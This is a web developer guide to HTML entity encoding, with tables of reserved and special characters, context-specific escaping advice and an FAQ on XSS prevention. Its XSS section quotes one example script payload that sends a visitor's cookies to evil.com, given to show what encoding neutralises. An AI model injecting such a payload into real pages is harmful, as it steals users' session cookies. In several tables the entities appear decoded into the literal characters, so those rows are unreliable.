HTML Entity Encoder Guide: Characters, Codes & XSS Prevention
Quick Answer
- *HTML entities represent reserved or special characters using codes like & for & and < for <.
- *5 characters must always be encoded: < > & " and ' (apostrophe).
- *Proper encoding is the first line of defense against XSS attacks, ranked the 3rd most critical web vulnerability by OWASP.
- *With 98%+ of sites using UTF-8, most special characters can be typed directly — but reserved characters still need entities.
What Are HTML Entities?
An HTML entity is a text string that starts with & and ends with ;. It tells the browser to render a specific character instead of interpreting it as code. Without entities, a < in your content would start an HTML tag instead of displaying a less-than sign.
The HTML specification defines over 2,000 named entities. Unicode itself contains more than 149,000 characters as of version 15.1 (September 2023), and any of them can be referenced via numeric entities.
Named vs. Numeric Entities
There are three ways to encode any character in HTML:
| Format | Example (Ampersand) | Syntax |
|---|---|---|
| Named entity | & | & + name + ; |
| Decimal numeric | & | &# + decimal code + ; |
| Hexadecimal numeric | & | &#x + hex code + ; |
All three render identically in the browser. Named entities are easier to read in source code. Numeric entities work for any Unicode character, including the 147,000+that don't have named versions.
The 5 Characters You Must Always Encode
These five characters have special meaning in HTML. Leaving them unencoded breaks rendering or creates security holes.
| Character | Named Entity | Numeric Entity | Why It's Reserved |
|---|---|---|---|
| < | < | < | Opens an HTML tag |
| > | > | > | Closes an HTML tag |
| & | & | & | Starts an entity reference |
| " | " | " | Delimits attribute values |
| ' | ' | ' | Delimits attribute values (single) |
The W3C Markup Validation Service flags unencoded ampersands as errors. According to W3Techs, roughly 6.2% of the top 10 million websites still have encoding validation errors related to unescaped ampersands in URLs.
Common Special Characters Reference
Beyond the five reserved characters, developers frequently need entities for typographic and mathematical symbols.
| Character | Entity | Description |
|---|---|---|
| — | — | Em dash |
| – | – | En dash |
| © | © | Copyright symbol |
| ® | ® | Registered trademark |
| ™ | ™ | Trademark |
| × | × | Multiplication sign |
| ÷ | ÷ | Division sign |
| | Non-breaking space | |
| → | → | Right arrow |
| € | € | Euro sign |
HTML Entities and XSS Prevention
Cross-Site Scripting (XSS) is one of the most common web vulnerabilities. OWASP ranks it as the 3rd most critical web application security risk in their 2021 Top 10. Proper HTML encoding is your first defense.
Here's how an XSS attack works without encoding. A user submits this as their "name":
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
If the application renders that input without encoding, the browser executes the script. With proper encoding, the browser renders it as harmless text because < becomes < and > becomes >.
According to Snyk's 2024 State of Open Source Security report, XSS vulnerabilities accounted for 18% of all reported web application vulnerabilities. The HackerOne 2024 report found that XSS was the most commonly reported vulnerability on their platform, appearing in 23% of all valid submissions.
Encoding in Different Contexts
HTML encoding alone isn't enough. Where the data appears determines what encoding you need:
- HTML body: Encode < > & " '
- HTML attributes: Same five, plus encode all non-alphanumeric characters with &#xHH format
- JavaScript strings: Use \xHH or \uHHHH escaping, never HTML entities
- URLs: Use percent-encoding (%HH), not HTML entities
- CSS values: Use \HHHHHH backslash escaping
UTF-8 and When Entities Are Optional
As of 2025, 98.2% of all websites use UTF-8 encoding according to W3Techs. UTF-8 supports every Unicode character directly, which means you can type most special characters (em dashes, curly quotes, accented letters) straight into your HTML without entities.
The five reserved characters still require entities regardless of encoding. But for everything else — ©, €, —, accented characters like é — UTF-8 handles them natively.
Make sure your HTML declares the encoding:
<meta charset="UTF-8">
And your server sends the correct Content-Type header: Content-Type: text/html; charset=utf-8. Mismatched encoding between the server header and the HTML declaration causes mojibake— garbled characters that make text unreadable.
Common Encoding Mistakes
Double encoding
Encoding an already-encoded entity turns & into &amp;, which renders as the literal text "&" instead of "&". This happens when multiple layers of your stack each apply encoding. A Stack Overflow developer survey found that double encoding was the most frequently asked-about HTML entity issue.
Forgetting attribute context
Encoding for the HTML body isn't sufficient inside attributes. An unencoded single quote in an attribute value like title='It's great' breaks the attribute and can create an injection vector.
Using entities in JavaScript
HTML entities only work in HTML context. Inside a <script> tag, use JavaScript escape sequences (\x27 for apostrophe, \x22 for double quote) instead.
Non-breaking space abuse
Developers sometimes use for spacing. It's meant to prevent line breaks between words (like "100 km"), not for layout. Use CSS padding and margin for spacing.
Encode and decode HTML entities instantly
Use our free HTML Entity Encoder →Frequently Asked Questions
What is an HTML entity?
An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;). It represents a character that is either reserved in HTML (like < and >) or not easily typed on a keyboard (like em dashes and copyright symbols). For example, <renders as the less-than sign (<).
What is the difference between named and numeric HTML entities?
Named entities use a human-readable label like & for the ampersand. Numeric entities use the Unicode code point in decimal (&) or hexadecimal (&) format. All three render the same character. Named entities are easier to read but only exist for about 2,000 of Unicode's 149,000+ characters.
Which characters must be encoded in HTML?
Five characters must always be encoded in HTML content: < (less than, <), > (greater than, >), & (ampersand, &), " (double quote, "), and ' (apostrophe, ' or '). Failing to encode these can break rendering or create XSS vulnerabilities.
How does HTML entity encoding prevent XSS attacks?
XSS (Cross-Site Scripting) attacks inject malicious scripts via user input. Encoding converts < to < and > to >, so browsers render the characters as text instead of interpreting them as HTML tags. OWASP ranks XSS as the 3rd most critical web application security risk.
Do I still need HTML entities if my page uses UTF-8?
You still need to encode the five reserved characters (<, >, &, ", ') regardless of encoding. For other special characters like em dashes, curly quotes, and symbols, UTF-8 lets you use them directly in your HTML without entities. Over 98% of websites now use UTF-8 according to W3Techs.